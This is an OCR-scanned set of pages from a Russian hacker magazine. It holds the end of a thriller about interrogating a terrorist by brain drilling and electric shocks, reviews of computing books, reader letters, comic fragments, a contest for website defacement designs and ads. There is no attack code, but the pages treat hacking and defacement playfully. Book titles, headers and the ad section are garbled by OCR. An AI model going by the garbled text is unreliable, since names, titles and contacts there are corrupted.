препарата, Лозински и Хасс напоминали два выжатых лимона - они абсолютно 
потеряли нить гипнотического контакта, что вызывало в них обоих только сильное 
неприкрытое раздражение. Все шло наперекосяк; времени осталось очень мало. Хасс 
почувствовал, что Лозински очень хочет сбросить с себя эту мерзкую ядерную 
ношу, которая оказалась ему не по плечу. Клаусу уже было наплевать и на 
Нобелевскую премию, которая, конечно же, никуда бы не делась, но результаты 
работы с Миллером наводили Лозински на грустные выводы, укрывать которые от 
общественности он, как честный и убежденный ученый, просто не мог. От этого 
становилось еще хуже; после скандала в палате, когда Клаус едва не влепил 
пощечину молодой анестезистке за ошибку, спровоцированную им самим (он неверно 
рассчитал дозу анестетика, попросту не обратив на это внимания - так поглотило 
его последнее внедрение), Лозински понял, что с работой надо кончать, о чем 
открыто заявил по телефону Максу: 

- Спасайте к чертовой матери этот Владивосток и что там еще есть рядом, - орал 
он в трубку, выпив несколько стаканов виски. - В черепе Миллера не осталось 
живого места - там уже просто негде сверлить дырки! Я не могу найти зону, 
отвечающую за пароли! - Он запустил хрустальный фужер в стену и автоматически 
нажал на кнопку вызова горничной. - Я отказываюсь работать с идиотом, 
заминировавшим целый корабль... 

Вместо горничной в кабинет вошел Хасс и аккуратно нажал пальцем на рычаг 
аппарата. В трубке мерно зазвучали короткие гудки. 

- Что вы себе... позволяете? - заплетающимся языком спросил Лозински и упал на 
диван. 

- Я, кажется, успел вовремя, - тихо сказал Хасс. - Еще пара стаканов, и вы не 
сможете мне помогать. Я сейчас внимательно проанализировал весь тот набор 
информации, выданный Миллером во время всех наших сеансов, и пришел к одному 
выводу. В связи с этим мне нужно, чтобы один из ваших людей сделал для меня 
следующее... 

И он протянул Клаусу лист бумаги с набросанным на нем торопливым почерком 
списком. Лозински слезящимися глазами просмотрел его и тяжело вздохнул: 

- Простите, коллега, я что-то плохо сейчас соображаю... Не понимаю, как я 
сорвался... Простите еще раз... В теперешнем состоянии я плохой помощник, 
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— Как вам это удалось? — кивнув в сторону трупа, спросил пересохшими губами Лозински. 


обратитесь к Брайтману, моему секретарю. Он, думаю, 
сможет все устроить - ведь, я понимаю, что все это 
надо очень срочно?.. 

Лжордж кивнул и вышел из кабинета. Клаус 
потихоньку засыпал, оставив этот мир наедине с 
атомной начинкой сухогруза. .. 


Миллер медленно приходил в себя. Его постоянно 
тянуло куда-то наверх, из забытья. Он и не 
сопротивлялся этому, поскольку на данный момент он 
не существовал как индивид, как личность и не 
испытывал никаких потребностей - он не знал, что 
должен скрывать пароль, он не знал, что должен 
хотеть умереть, он не помнил своего имени и своего 
прошлого. В этом Клаус Лозински преуспел - 
промежуточные фазы проходили для Миллера как одна 
секунда без нарушения центральной нервной 
деятельности, все процессы были заторможены, 
заблокированы, управление ими целиком принадлежало 
дежурной анестезистке со шприцем в руках. Лозински 
был уверен, что на таком уровне самопожертвования, 
какой явил на первом сеансе Миллер, в его мозгу 
наверняка может оказаться ”самурайский меч” - что- 
то типа виртуального харакири, активирующегося при 
попытке доступа к информации определенного рода. 
Ana этого террорист был отправлен на такую глубину 
психомоторного торможения, что все попытки взорвать 
мозг изнутри не принесли бы результата. 

Но вот приходило время, в катетер, торчащий из 
подключичной ямки, вливалась очередная субстанция, 
и все нервные процессы в организме словно оживали 
от спячки. Вот участилось дыхание, зарозовели щеки; 
вот смешно зашевелились ноздри, чувствующие зонд, 
заведенный в желудок через нос. Дрогнули веки; 
ноги немного согнулись в колене. Миллер проснулся. 
Джордж встал у его изголовья и положил ладонь 
правой руки на повязку, скрывающую решето в 
черепе. 

- Миллер, это Хасс. Вы слышите меня? 

Никакой реакции. Это уже стало привычным делом. 
Джордж усмехнулся, подошедший ассистент из числа 
предложенных Брайтманом, установил векоподъемники. 
Глаза Миллера широко распахнулись и увидели перед 
собой большой белый экран, как в кинотеатре. 

- Я профессионал, Миллер, и я знаю, что вы сейчас 
все прекрасно видите. Перед вами - обыкновенная 
белая простыня, таких сотни, если не тысячи в 
нашей клинике. Но эта простыня - особенная. Я 
думаю, что когда все закончится, ее повесят в 
музее. Для нее специально создадут музей 
нейрохирургии и нейропрограммирования, и она будет 
единственным и самым главным экспонатом - хотя, 
безусловно, этим экспонатом должны были быть вы. 
Это было маленькое предисловие. А теперь попрошу 
вас не пытаться закрыть глаза - это у вас просто 
не получится. При попытке смотреть в сторону вас 
заставят вернуть глаза в прежнее положение - и это 
будет очень больно. С некоторых пор мы перестали 
исповедовать принципы гуманизма - как только мы 
поняли, что в связи с этим самым гуманизмом через 
сутки погибнет два миллиона человек... 

Джордж взглянул куда-то вбок и кивнул. Свет в 
палате погас, на простыню откуда-то из-за спины 
Миллера проецировалось изображение. Он увидел 
огромную толпу народа, медленно бредущую по улицам 
с крестами на спинах - они тащили их на Голгофу. 
Миллер ничем не выдал, что смотрит, - он просто не 
понимал смысла происходящего. Попытался взглянуть в 
сторону - и получил мощный удар током в живот. Он 
едва не сложился пополам, дыхание сорвалось, он 
закашлялся и застонал одновременно. 

- Смотрите, Миллер, смотрите, - из-за спины, 
оттуда, откуда бил цветной луч, раздался голос 
Хасса. - Это все для вас. 

Картины сменялись одна за другой. Из святых мест 
они перенеслись в школу - обыкновенную американскую 
школу, где дети лет десяти-двенадцати отвечали 
какие-то уроки. Дальше - зоопарк, маленькие 
медвежата; потом - мать, гуляющая с малышом на 
лужайке возле дома. Картины сменялись достаточно 
медленно, Миллер был в состоянии разглядеть каждое 
движение на экране, каждую мелочь. Он хотел что-то 


спросить, но получил еще один удар током, после 
которого приходил в себя несколько дольше; вопросов 
он решил не задавать. 

Внезапно он понял, что сейчас на экране кадры 
художественного фильма - огромная конвейерная лента 
сбрасывает в кучу чьи-то трупы; вдруг на фоне 
черно-белого кино промелькивает красненькое детское 
пальтишко, которое вместе со всеми вещами 
скрывается в горе тел. Миллер вспомнил - это 
Список Шиндлера”. 

Дальше какие-то мультики, радостные визжащие от 
восторга дети и... Несколько кадров из 
”Армагеддона”. Миллер его не видел, он познакомился 
только с рекламным роликом, но почему-то узнал 
этот фильм - огненные шары, разрушающие мир, 
падали с неба... 

Дальше вообще было что-то завораживающее. 
Фрагменты, снятые в Хиросиме, чередовались с 
диснеевскими героями; ядерный полигон в Неваде 
соседствовал с Гарри Поттером. Весь этот хоровод 
поглотил Миллера целиком. Несмотря на льющиеся из 
глаз слезы, он смотрел и смотрел, не пытаясь 
отвернуться - и не потому, что боялся удара током. 
Перед ним сейчас был весь мир... 

Он не чувствовал, что откуда-то сбоку льется 
тоненький, дрожащий лазерный луч. Хасс торопливо 
накладывал голубую сетку на полученные в результате 
сеанса изображения глаз Миллера. Компьютер начал 
привычную работу; заструились линии света по 
огромным радужным кругам с черными провалами 
зрачков. Тем временем интенсивность изображения на 
простыне уменьшалась с каждой секундой, но Миллер 
продолжал видеть все это перед своими распахнутыми 
глазами - страх, война, смерть. 

Тем временем Джордж получил результат. По его 
команде в палате тут же вспыхнул свет. Миллер, 
очнувшийся от грез, попытался возмутиться, но 
побоялся очередной молнии под одеялом и промолчал. 
Медсестра молча ввела в катетер необходимый 
коктейль; вновь на голову Миллера надвинулся шлем 
со сверлами. 

В этот раз Хасс выглядел не так, как во время 
первого эксперимента в аудитории. Он твердой рукой 
настроил координаты и дал команду. Очередные три 
трепанационных отверстия появились в голове 
дернувшегося на мгновенье Миллера, потом в его 
мозг вонзились три электрода. 

Джордж, затаив дыхание, подошел к Миллеру и 
протянул ему лист бумаги. Но тот уже не мог ничего 
писать. Дрожащим движением пальцев на руке он 
попросил Хасса нагнуться к нему и прошептал на ухо 
слабеющими губами адрес в Израиле. Потом он еще 
что-то сказал самому себе на арабском и умер. 
Реанимационная бригада, вскочившая со своих мест по 
сигналу аппаратуры, была остановлена жестом Хасса: 
- Не надо. Он уже сделал на этом свете все, что 
мог. Пусть отдохнет. А сейчас мне нужна ручка - 
пока я не забыл его слова... 

(Через три часа в центре Иерусалима по названному 
Миллером адресу был взят опытный шифровальщик, 
помогавший осуществить взлом сервера. Он быстро 
сломался и рассказал все, что от него требовалось. 
Сухогруз ”Фаворит” к вечеру покинул порт 
Владивосток и отправился дальше...) 

Лозински, с трудом стоя на ногах, смотрел на весь 
ход эксперимента Хасса через верхнюю стеклянную 
полусферу палаты. Хмель стучал в его голове 
отбойным молотком, но Клаус, вцепившись жилистой 
рукой в перила, выдержал до самого конца, после 
чего спустился вниз и вошел в палату, где Джордж 
склонился над мертвым Миллером. 

- Как вам это удалось? - кивнув в сторону трупа, 
спросил пересохшими губами Лозински. - Что это 
было, коллега? 

Хасс оглянулся. Потом подошел к огромному 
спроецированному на пластиковую белую доску 
изображению радужки Миллера, взял в руки маркер и 
обвел две точки - по одной в каждом из глаз. 

- СОВЕСТЬ, - тихо сказал он трезвеющему Лозински, 
снял халат и вышел на улицу покурить... 
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КНИЖКИ 


ТаАнсумт MEBUH. E-mail «БЕЗОПАСНАЯ». — 
Т.: ПАООР, 2ООе — 192 с. 


Эххх, не устану я повторять, что 
книги этого «продвинутого хаке- 
ра» по своей полезности ничем не 
отличаются от хм... обычной газе- 
ты типа «Из рук в ноги». Да, конеч- 
но, тема, затронутая в этой буке, 
очень интересная, но так, как изла- 
гает ее автор, никуда не годится... 
Мало того, что это еще одна книга 
из серии copypast, так еще и резко 
различающиеся по стилю изложе- 
ния главы (автор то говорит сухим 
языком энциклопедии, то выдает 
жаргонные слова по несколько 
штук в каждом предложении, то 
вообще сбивается на лепет ребен- 
ка), в общем-то, оставляют весьма скверное впечатление. Правда, 
справедливости ради, стоит сказать, что одна глава про взлом поч- 
ты через веб-интерфейс вполне подойдет для твоего изучения 
(источник ты без труда отыщешь в списке использованной литера- 
туры, который находится в конце книги), хотя читать все-таки при- 
ятнее в оригинале. 
Рекомендовано: никому :( - можно найти и более достойные 
книги для чтения. 


Т. HPUCTUAHCEH, Н. TOPHUHFTOH. PERL 
BUBNUOTEHA MNPOrFPAMMUCTA. — СПБ.: NUTEP, 
2001 — 736 с. 


Ну, что можно сказать про книгу 
по программированию кроме то- 
го, что это узконаправленная ли- 
тература для мастеров компью- 
терного мира?.. Наверное, не 
много, но только не про этот эк- 
земпляр. Вообще, серия «Библи- 
отека программиста» достаточно 
хорошая, и эта книга не исключе- 
ние. В отличие от других книг по 
программированию, похожих на 
справочники, эта является до- 
полнением ко всем другим и, ско- 
рее, похожа на поварскую книгу 
(причем это ее истинное англий- 
ское название - perl cookbook), в 
нужный момент можно найти рецепт, подходящий для решения 
именно нужной задачи. Тут рассмотрено много недокументиро- 
ванных функций перла и показаны на примерах основные при- 
емы программирования на этом языке. Авторы утверждают, что 
все программы, приведенные в книге, были «изучены лучшими 
специалистами, включая создателя Perl Ларри Уолла». Поняв, о 
чем говорится в книге, ты сможешь написать грамотный сцена- 
рий, защищенный со всех сторон, исключающий script kidding. 
Рекомендовано: перл-программерам и перл-новичкам для по- 
вышения знаний об этом языке и для использования уже гото- 
вых проверенных прог, описанных в кукбуке. 
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ЧАаАРПЗ Dict. MUOHC. РАЗРАБОТНА WEB— 
Y3BNOB. WEB—NPOPECCUOHANAM. — HUEB: 
BHV, 2001 — 304 с. 


Я недавно решился наладить 
web-cepsak в сети и, прогулива- 
ясь мимо книжных полок, никак 
не смог пройти около этого эк- 
земпляра, не заглянув внутрь. 
Книга хоть и небольшая, но зато 
в ней много полезной инфы. Ав- 
тор решился рассказать тебе про 
такую важную тему, как проек- 
тирование и создание своего 
web-y3na. Что немаловажно, в 
книге рассматриваются разные 
аспекты при разработке сайта: 
проектирование, анализ и собст- 
венно реализация своих идей. 
Прочитав книжку, ты сможешь 
выбрать оптимальные средства 
для разработки, а затем создать оригинальный, запоминаю- 
щийся дезигн и удобную навигацию по узлу с применением пе- 
редовых технологий (XML, XHTML, XSL, etc...). Немалую часть 
составляют разделы, посвященные графике и языку XML. При- 
чем все здесь разложено по полочкам - последовательно, шаг 
за шагом. И к тому же все основные принципы, изложенные в 
книге, рассмотрены на конкретном примере создания сайта. 
Имеется также интересная глава, где рассказывается про опти- 
мизацию паги для инвалидов ;). 

Рекомендовано: веб-дезигнерам, чтобы, освоив книгу, они 
смогли создать сайт, который отдефейсить просто рука не под- 
нимется! 


Газработка 
WEB-)3108 


АПЕНСАНОР PPONOB, FPUTOPUU ФРОПОВ. 
Созраняче WEB—NPUNOXCEHUU. 
NPAHTUYECHOE PYHOBODCTBO. — М.: 
«<PYCCHAA PEDAHUUGA», 2001 — 1040 с. 


(ей фолиант предназначен преж- 
де всего для веб-программеров, 
разрабатывающих всяческие цги, 
ява, азр скрипты, и админов, ра- 
ботающих с 115. Этот толстенный 
талмуд призван рассказать тебе о 
«подводных камнях», возникаю- 
щих при создании всяких веб- 
приложений и проблем, которые 
будут сопровождать тебя во вре- 
мя настройки веб-сервера. Мож- 
но сказать, что этот труд вместил 
в себя несколько отдельных книг 
по Internet-TexHonoruaM, ведь Ha 
страницах этой книги можно об- 
наружить просто огромное коли- 
чество информации по указанной тематике. Читая эту книгу, я 
постепенно проникся уважением к авторам, ведь написать 
столько про известные вещи под силу не каждому. Но это не 
слова презрения в их сторону, наоборот: если ты ничего не 
знал до этого про создание сайта, об отладке веб-приложений 
и настройке сервера, то после изучения этой книги ты будешь 
практически в совершенстве владеть нужными навыками - ав- 
торы постарались изложить информацию максимально по- 
дробно и понятно даже для новичка в сетевых технологиях. 
Также надо отметить наличие небольшого бонуса - диска с при- 
мерами, описанными на страницах буки. 
Рекомендовано: именно тебе, если знаний в области меБ’а у 
тебя не хватает. 


Редакция выражает благодарность магазину 
“Библио-Глобус” за предоставленные книги. 


ИНТЕРНЕТ-МАГАЗИН 
С ДОСТАВКОЙ 


NuUTEP YSHPAUT. APACHE DNA 
MNPOPECCUOHANOB. — М.: ПОРЫ, 2001 — 
413 с. 


Эта книга порадует любителей 
апача во всех его проявлениях 
- как под родную, никсовую 
платформу, так и его вариации 
под другие оси. Ведь здесь рас- 
сматриваются основные вопро- 
сы конфигурирования сервера, 
общие для всех систем, и спе- 
цифические фишки, присущие 
разным операционкам. В этой 
книге тебе дадут полное описа- 
ние апача, начиная с момента 
закачки и заканчивая подроб- 
ным объяснением возможнос- 
тей каждого модуля (для чего 
нужен, как подключить, настро- 
ить). Полностью освоив все 

разделы книги, ты научишься настраивать прогу согласно 

твоим требованиям, повысишь производительность сервера, pa 

узнаешь, как протестировать настройку и прикрутить языки ПРИНОСНИСЬ/ 

программирования (perl и php, в частности). Также целая 

глава посвящена проблемам уязвимости апача изнутри и >= 

снаружи, тут объясняются проблемы при настройке, которые Н ЛЕГЕНДЕ Ш 

могут привести к «нежелательному» доступу извне. Эту буку ня 

можно использовать как большой подробный справочник 

сервера, написанный хорошим, понятным языком без глупых 

ошибок и опечаток. Немного огорчило отсутствие готовых 

примеров по настройке и скриптов, описанных в книге, но 

автор утверждает, что их можно получить по адресу 

http://www.wrox.com (проверено... не работает : (, хотя, мо- © 

жет, сервер просто был в дауне). © 

Рекомендовано: админам для изучения, чтобы свести веро- [1$] 
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ПИСЬМА 


Koshkarov Andrey 
KoshkarovAA@admhmao. ru) 
Subj: RedHat7.2 


Здаровенько перцы!!! 

Почитал с удовольствием ваши статейки 
про Бо5-атаки, занятня ето штука. 

Если вы действительно такие спецы то 
помогите мне, если конечно ето в ваших 
силах. У нас в шараге сеть и мы 
вылазим в инет через проксу сервак 
стоит под WinNT 4.0 srv. Я на свою 
машину поставил Линух RedHat7.2 и как 
мне настроить совместный доступ к 
общим ресурсам (smb, nfs), етот линух 
я ни хрена не знаю, а так хочется. 
(Достали ети форточки :((( ) Запарился 
уже искать инфу, править. :(C(CCCCO 
Надеюсь на вас. 


Ейх, дарова, Андрюха! 
Уверяю тебя, мы тут спецы, 
«не горюй». Аж такие спецы, что и 
журнал так назвали - Спец! Но как-то 
не клево получится, если мы будем 
прямо тут, в рубрике e-mail, помогать 
тебе с твоими общими ресурсами. Это 
потом. А вот то, что ты линя себе 
вставил - это круто! И то, что честно 
признаешься, что ни фига в нем не 
шаришь, тоже круто. Именно так люди и 
учатся работать с новыми осями - 
просто берут в один прекрасный момент 
и ставят! Честное слово, я сам так 


по самое 
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линуксоидом стал ;). Блин, a то 
некоторые умники с десятой попытки 
кое-как умудрятся себе пингвина 
отинсталить и ходят потом пальцы на 
остальных кидают, типа, не умеешь - не 
ставь, не знаешь - не лезь. Чушь 
полная! Имхо, должно звучать так: не 
знаешь - лезь и разбирайся! Так что 
вот так вот. Удачи тебе в твоих 
линевых делах! 


OverSeer XXX 
(overseer31337@rambler.ru) 
Subj: Есть мнение... 


Привет всем, кто ходит под созвездием 
31337! Читаю вас, начиная с ХЗ какого 
года, но не писал ни разу. Тем более 
в Спец. Что же я пишу-то? A у меня же 
мнение тут есть. 

Значит так. Приобрел недавно ваш номер 
Cney-B3nom-DoS, Прочитал про полный 
3,14zDoS. Могу сказать: «Ребята, вы 
исправляетесь!» Правильно, хватит 
всякой ерунды типа СМИ и т.д. Мы ж 
киберпанки, гики, хакеры (а таких 
много?). Но с другой стороны слишком 
много общего (а может я просто еще не 
дошел до конкретного?). А так Спец 
оживает. И это радует. Удачи в ваших 
начинаниях! 


Приятель, ты 
насколько я с тобой согласен!.. 
постой... Это ты же со мной 
согласен... Короче, не важно! Важно 
то, что Спец должен быть именно 
таким, каким он вышел с DoS-atakamn. 
И он будет таким, пока все пиплы из 
Spez-Crew He перемрут перед своими 
клавами, а на их места не посадят 
роботов-андроидов, которые будут 
объединены общей нейронной сетью. 
один прекрасный день они решат 
захватить власть, пустить всех людей 
на горючее, а самим начать строить 
совершенное общество андроидов... 
Стоп, что-то я увлекся ;). К черту 
этих андроидов. Я просто хотел 
сказать, что мы стараемся делать все, 
чтоб вам, ребята, было интересно 
читать наш журнал. Именно интересно и 
именно читать, а не перелистывать по 
привычке. 

А по поводу конкретно/не конкретно - 
имхо, местами вполне конкретно. 
Настолько конкретно, что пришлось 
искусственно делать менее конкретно, 
дабы никто не заимел всяких 
неприятностей и проблем ;). 


даже не представляешь, 
Нет, 


А в 


Dr. Banan [dr.banan@inbox. ги] 


Subj: Тостер меня предал... За мной 
следят со спутика... Придется всех 
убить... 


Hello spec, 


Вот тут листал новогодний спец, ну, 
где про снежковые маневры написано. И, 
что дальше... А!, ну, типа, я только 
сщас заметил, где вы играли в снежки 
(в общем, здесь 8=> пл.Земля => 
м.Марьино => р.Москва => парк им. 850- 
летия Москвы). 


З.Ы. У меня дом через дорогу. 
3.3.Ы. Я всегда знал, что меня 
преследуют. .. 


Угадал, черт побери! Именно там мы и 
играли! Ну что ж, раскрыл наш секрет 
- придется тебя убрать... ;). Шучу, 
конечно! Мы такими делами не 
занимаемся. Наоборот, есть куча 
народу, которые сами только и хотят, 
чтоб угрохать кого-нибудь из Spez- 
Crew... А по поводу спутников ты не 
волнуйся - ты думаешь, мы просто так 
в Марьино поехали играть? Во-первых, у 
нас там есть свои люди ;). Во-вторых, 
там атмосфера насыщена тяжелыми 
элементами, из-за которых спутники 


глючить начинают - падают. Тут то мы 
их и подбираем. Так что «Большие 
Снежковые Маневры» - это отмаза была: 


пока часть Spez-Crew квачилась в 

снежки, остальные под прикрытием этого 
мероприятия втихаря разбирали спутники 
на детали. Просто, у Феди Добрянского 
они закончились - надо же было где-то 


достать... 


vadim shahverdiev (ad999@mail.ru) 
Subj: <no subj> 


привет всем! спасибо что сделали такой 
журнал. хотел бы попросить чтобы один 
из них вы посвятили counter-strike 
заранее спасибо 


р.5. передайте птго что его рассказы супер 


Привет, Вадим! 

Спасибо тебе, что нам написал - очень 
приятно :)! Блин, честно тебе 
признаюсь, номера по Counter-Strike не 
будет. Игра, конечно, мега-рулезззная, 
но мы тут решили, что в ближайшее 
время писать будем в основном про 
взломы. А если сейчас Spez-Crew 
засядет за Контру, то хрен потом кого 
оторвешь от нее и заставишь продолжать 
писать про взлом. Так что, пока 
контровского номера не намечается. 
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КАК ВИДИТЕ, 

Я УЗНАЛ О ВАС 
И ВАШИХ 

| БЛИЗКИХ BCE. 
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А ТЕПЕРЬ МАРШ \ А 
В МАШИНУ № 


SF ПОЧТИ ИНТЕГРИРОВАЛ 
СВОЮ МАТРИЦУ, КОГДА ВЫ 
ВЛЕЗЛИ, ГОПНИКИ ХРЕНОВЫ! 

НУ, НИЧЕГО СЕЙЧАС 
ПРОЕДЕМСЯ К СТРАЖУ 
у И ВЫ BCE МНЕ 
РАССКАЖЕТЕ. 
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ТАК, ТАК, СТРАЖ, | 
ЧЕГО ЭТО ТЫ 
ЗАДУМАЛ... СЦУКА! 
НИЧЕГО, ДАЙ МНЕ 
ТОЛЬКО ДОБРАТЬСЯ 
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МУЖИКИ, ВЫ 
МНЕ ГЛУБОКО СИМПАТИЧНЫ, 
И Я ДАЖЕ ВЗЯЛ БЫ ВАС К 
СЕБЕ НА РАБОТУ, НО МНЕ 
НУЖНО TO, ЧТО ВЫ , 
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“" ВВОДИТЕ ДАННЫЕ, Vs 
НАДЕЮСЬ У ВАС ХВАТИТ 
МЕСТА. КСТАТИ, Я ХОТЕЛ БЫ 
ПОЛУЧИТЬ СВОЙ KOA. 
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СИМПАТИЧНЫ, И У МЕНЯ ХОРОШЕЕ 
НАСТРОЕНИЕ. ТОЛЬКО ПОЭТОМУ ВЫ ЕЩЕ 
ЖИВЫ. НАДЕЮСЬ, НЕ НАДО ОБЪЯСНЯТЬ, 
ЧТО ОДИН ЛИШНИЙ ПИСК ИЛИ ПОПЫТКА 
CYHYTbCA В МОИ ДЕЛА, И ВАС 
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ДА, ПОХОЖЕ Я \ 
ЛАЖАНУЛСЯ. 


ОБЪЯСНИШЬ... 
| ИНТЕРЕСНО, 
\ ЧТО ЖЕ ТАКОЕ 
ТЫ СПЕР? 
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Хех, наверное несложно догадаться, 
но в этом номере у нас будет конкурс 
на самое оригинальное оформление 

для дефейса. Сайт ломать 
не обязательно! Просто пришли нам 
на spec@real.xakep.ru свой шедевр 
дефейсмент-искусства. 

Мы его заценим, и, если ты победишь, 

подарим тебе клевый приз. 


Желаем удачи, твои суслики 
их Spez—Crew. 
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1000, 3000 рублей, — из своего ное воплощение цифровой валюты снабжены интерфейсом для подключения 
Интернет.Кошелька вы можете интернета. Поэтому они изготовлены к интернету. А пока скачайте бесплатный 
заплатить любую сумму, начиная из твердых пород высококачественного Интернет.Кошелек с сайта money.yandex.ru. 
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2 las AUPpOTET ery vance re АЕ Вр ee pew Sem ee et в два раза больше. А безопасность всей 


= ! системы интернет-платежей обеспечивается 
использованием стойких криптографических 
алгоритмов PayCash. 


Наидётся всё. Я4ех 


Деньги 


money.yandex.ru 


Пригпашаем К сотрудничеству авторов 


noah@real.xaker.ru 


Фут 


Digitally yours 


Посмотри на мир с нам! 


> re 


freedom of mind 


= 


2 Dina Victoria 
ho (095) 252-2030, 252-2070 


riko Ammon Coane [095 240-2097; Goan: (OS) 18-0: Been 

OFS) BAD PAO, ДЕЛ (ORS) 250.555: ergy (0S) Ve PA: dese (ORS) Fa Te, 
КИТ Kcereacie (OFS) TT TiS Barrer cq SAS HFS] 956. 12725; 

FE м К 095] Pe 18; НИКС (OPS) P3440; Coteece Nebopetopes (095) Tha PD, 
СЕНА eS) 2 8-Aa ТЕ; Teepe Kicaeeareper AOS] RASPES: OL bee ВОИС] 472-640 
A Loespatars (09) Pe Py CLD aS) TSR: РАВ [PS] eo ок 

BS (OS) FO TO 

+t, Bopomen: Сона (0727) 733-292, 742-148; г.Товаменыя МНОНОС -Тенниюясы (457) 97-00-3% 


Приглашаем к сотрудничеству 


fie, nororen inte ini, eri - ape eee oe с ло: И ее 


